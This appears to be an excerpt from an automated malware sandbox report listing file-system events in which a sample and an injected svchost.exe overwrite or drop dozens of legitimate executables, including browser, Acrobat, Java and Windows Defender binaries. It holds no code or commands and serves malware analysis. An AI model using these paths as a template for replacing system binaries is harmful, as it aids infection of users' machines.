              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
